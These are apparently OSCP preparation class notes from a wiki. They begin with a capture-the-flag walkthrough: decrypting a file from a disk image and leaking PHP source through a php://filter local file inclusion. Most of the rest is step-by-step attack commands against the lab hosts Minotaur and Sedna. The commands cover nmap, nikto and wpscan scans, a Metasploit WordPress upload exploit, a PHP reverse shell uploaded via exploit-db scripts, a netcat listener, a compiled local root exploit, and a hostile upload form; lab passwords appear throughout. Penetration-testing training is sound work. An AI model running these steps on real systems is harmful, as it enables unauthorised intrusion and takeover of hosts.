mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
/mnt/217vm# ls
cd /media/bobsdisk/
ls
cat ToAlice.eml
file bobsdisk.dsk
mkdir /media/bobsdisk
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
/mnt/217vm# ls
cd /media/bobsdisk/
ls
cat ToAlice.eml
file ToAlice.csv.enc
file bobsdisk.dsk
pwd
mkdir /media/bobsdisk
mount /mnt/217vm/bobsdisk.dsk /media/bobsdisk
ls
cd /media/bobsdisk/
ls
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
ls
cat ToAlice.eml | grep flag
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
ls
cat ToAlice.eml
***** look for supercalifragilisticoespialidoso ******
openssl enc -aes-256-cbc -d -md sha256 -in ToAlice.csv.enc -out ToAlice.csv
supercalifragilisticoespialidoso
ls
cat ToAlice.csv
-----------------------------------------------------------------------
-----------------------------------------------------
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site!
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?
-----------------------------------------------------
The hints are "Web Path" and "strangest URL" so let's try the long strings in the URL:
http://172.31.2.217/5560a1468022758dba5e92ac8f2353c0/
-- view source
Found this string in the source:
R2VvcmdlIENvc3RhbnphOiBbU291cCBOYXppIGdpdmVzIGhpbSBhIGxvb2tdIE1lZGl1bSB0dXJr
ZXkgY2hpbGkuIApbaW5zdGFudGx5IG1vdmVzIHRvIHRoZSBjYXNoaWVyXSAKSmVycnkgU2VpbmZl
bGQ6IE1lZGl1bSBjcmFiIGJpc3F1ZS4gCkdlb3JnZSBDb3N0YW56YTogW2xvb2tzIGluIGhpcyBi
YWcgYW5kIG5vdGljZXMgbm8gYnJlYWQgaW4gaXRdIEkgZGlkbid0IGdldCBhbnkgYnJlYWQuIApK
ZXJyeSBTZWluZmVsZDogSnVzdCBmb3JnZXQgaXQuIExldCBpdCBnby4gCkdlb3JnZSBDb3N0YW56
YTogVW0sIGV4Y3VzZSBtZSwgSSAtIEkgdGhpbmsgeW91IGZvcmdvdCBteSBicmVhZC4gClNvdXAg
TmF6aTogQnJlYWQsICQyIGV4dHJhLiAKR2VvcmdlIENvc3RhbnphOiAkMj8gQnV0IGV2ZXJ5b25l
IGluIGZyb250IG9mIG1lIGdvdCBmcmVlIGJyZWFkLiAKU291cCBOYXppOiBZb3Ugd2FudCBicmVh
ZD8gCkdlb3JnZSBDb3N0YW56YTogWWVzLCBwbGVhc2UuIApTb3VwIE5hemk6ICQzISAKR2Vvcmdl
IENvc3RhbnphOiBXaGF0PyAKU291cCBOYXppOiBOTyBGTEFHIEZPUiBZT1UK
------ https://www.base64decode.org/ -------
------ Decoded, but didn't find a flag -----
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/
-- view source --
-- Nothing in source --
Browsed to the flag link:
view-source:http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=flag
-- view source --
-- Nothing in source --
Tried a PHP base64 decode with the URL:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=welcome.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=party.php
------ https://www.base64decode.org/ -------
Use the string found here:
http://172.31.2.217/c2444910794e037ebd8aaf257178c90b/?p=php://filter/convert.base64-encode/resource=flag.php
-------------------------------------------------------------------
PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==
-------------------------------------------------------------------
<?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?>
<h1>Flag</h1>
<p>Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?</p>
<img src="trollface.png" />
<?php
// Ok, ok. Here's your flag!
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
//
// Well done, you're doing great so far!
// Next step. SHELL!
//
//
// Oh. That flag above? You're gonna need it...
?>
######################
# Attacking Minotaur #
######################
Step 1: Portscan/Bannergrab the target host
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.117
-----------------------------------------------------------------------
Step 2: Vulnerability scan the web server
---------------------------Type This-----------------------------------
cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd ~/toolz/Nikto2/program
perl nikto.pl -h 172.31.2.117
-----------------------------------------------------------------------
Step 3: Directory brute-force the webserver
---------------------------Type This-----------------------------------
cd ~/toolz
git clone https://github.com/v0re/dirb.git
cd dirb/
./configure
make
dirb
./dirb http://172.31.2.117 wordlists/big.txt
-----------------------------------------------------------------------
### dirb output ###
==> DIRECTORY: http://172.31.2.117/bull/
-----------------------------------------------------------------------
Step 4: Run wordpress vulnerability scanner
---------------------------Type This-----------------------------------
sudo apt-get install -y libcurl4-openssl-dev libxml2 libxml2-dev libxslt1-dev ruby-dev build-essential libgmp-dev zlib1g-dev
cd ~/toolz
rm -rf wpsca*
git clone https://github.com/wpscanteam/wpscan.git
cd wpscan
sudo gem install bundler && bundle install --without test development
rbenv install 2.5.0-dev
ruby wpscan.rb -u http://172.31.2.117/bull/ --enumerate u
-----------------------------------------------------------------------
Step 5: Attack vulnerable Wordpress plugin with Metasploit
---------------------------Type This-----------------------------------
cd ~/toolz/metasploit
./msfconsole
use exploit/unix/webapp/wp_slideshowgallery_upload
set RHOST 172.31.2.117
set RPORT 80
set TARGETURI /bull
set WP_USER bully
set WP_PASSWORD Bighornedbulls
exploit
-----------------------------------------------------------------------
Damn...that didn't work...Can't reverse shell from inside the network to a host in the VPN network range.
This is a lab limitation that I implemented to stop students from compromising hosts in the lab network
and then from the lab network attacking other students.
---------------------------Type This-----------------------------------
wget http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
tar -zxvf php-reverse-shell-1.0.tar.gz
cd ~/toolz/php-reverse-shell-1.0/
nano php-reverse-shell.php
-----------------------------------------------------------------------
***** change the $ip and $port variables to a host that you have already compromised in the network
***** for this example I chose 172.31.2.64 and kept port 1234
---------------------------Type This-----------------------------------
chmod 777 php-reverse-shell.php
cp php-reverse-shell.php ..
-----------------------------------------------------------------------
----------- Paste this into a new file called wp_gallery_slideshow_146_suv.py -----------
https://www.exploit-db.com/raw/34681/
python wp_gallery_slideshow_146_suv.py -t http://172.31.2.117/bull/ -u bully -p Bighornedbulls -f php-reverse-shell.php
-----------------------------------------------------------------------
Set up netcat listener on previously compromised host
---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
webmin1980
python -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
./boom2
nc -lvp 1234
-----------------------------------------------------------------------
---------------------Type This in your browser ------------------------
http://172.31.2.117/bull//wp-content/uploads/slideshow-gallery/php-reverse-shell.php
-----------------------------------------------------------------------
Now check your listener to see if you got the connection
---------------------------Type This-----------------------------------
id
/sbin/ifconfig
python -c 'import pty;pty.spawn("/bin/bash")'
---------------------------Type This-----------------------------------
cd /tmp
cat >> exploit2.c << out
-----------------------------------------------------------------------
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/
**************hit enter a few times *****************
---------------------------Type This-----------------------------------
out
gcc -o boom2 exploit2.c
./boom2
id
-----------------------------------------------------------------------
......YEAH - do the happy dance!!!!
##################
# Attacking Sedna #
###################
Attack steps:
-------------
Step 1: Ping sweep the target network
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------
Step 2: Port scan/Bannergrab the target host
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.86
-----------------------------------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
53/tcp open domain ISC BIND 9.9.5-3-Ubuntu
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2-4 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
143/tcp open imap Dovecot imapd
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: SEDNA)
514/tcp filtered shell
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
SF-Port22-TCP:V=6.40%I=7%D=1/26%Time=5A6B4540%P=x86_64-pc-linux-gnu%r(NULL
SF:,29,"SSH-2\.0-OpenSSH_6\.6\.1p1\x20Ubuntu-2ubuntu2\r\n");
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 246.11 seconds
Step 3: Vulnerability scan the webserver ports
---------------------------Type This-----------------------------------
cd ~/toolz/
rm -rf nikto*
git clone https://github.com/sullo/nikto.git Nikto2
cd Nikto2/program
perl nikto.pl -h 172.31.2.86
perl nikto.pl -h 172.31.2.86:8080
-----------------------------------------------------------------------
Step 4: Perform directory bruteforce against the target host
---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
perl Webr00t.pl -h 172.31.2.86 -v
-----------------------------------------------------------------------
or with dirbuster (dirb)
---------------------------Type This-----------------------------------
cd ~/toolz
git clone https://github.com/v0re/dirb.git
cd dirb/
./configure
make
dirb
./dirb http://172.31.2.86 wordlists/big.txt
-----------------------------------------------------------------------
### dirb output ###
==> DIRECTORY: http://172.31.2.86/blocks/
==> DIRECTORY: http://172.31.2.86/files/
==> DIRECTORY: http://172.31.2.86/modules/
==> DIRECTORY: http://172.31.2.86/system/
==> DIRECTORY: http://172.31.2.86/themes/
+ http://172.31.2.86/robots.txt (CODE:200|SIZE:36)
+ http://172.31.2.86/server-status (CODE:403|SIZE:291)
### dirb output ###
Browsed each of the directories and found that inside of the /themes folder contained the vulnerable application Builder Engine 3.5.0
An exploit for this application can be found at:
https://www.exploit-db.com/exploits/40390/
-------------------save this a "BuilderEngine.html"-------------------
<html>
<body>
<form method="post" action="http://172.31.2.86/themes/dashboard/assets/plugins/jquery-file-upload/server/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" />
<input type="submit" value="send" />
</form>
</body>
</html>
-----------------------------------------------------------------------
Download this webshell (http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz) to your local machine.
Change the IP address in the source code of the webshell to another server in the lab network that you have root access to.
On the other server run:
nc -lvp 1234
Then upload the pentestmonkey reverseshell to .86
============================================ Attacking another server because I need a reverse shell =========================================
seguridad/enlaces/certificaciones/oscp/oscp_prep_class.txt · Última modificación: 2018/11/22 18:00 por 127.0.0.1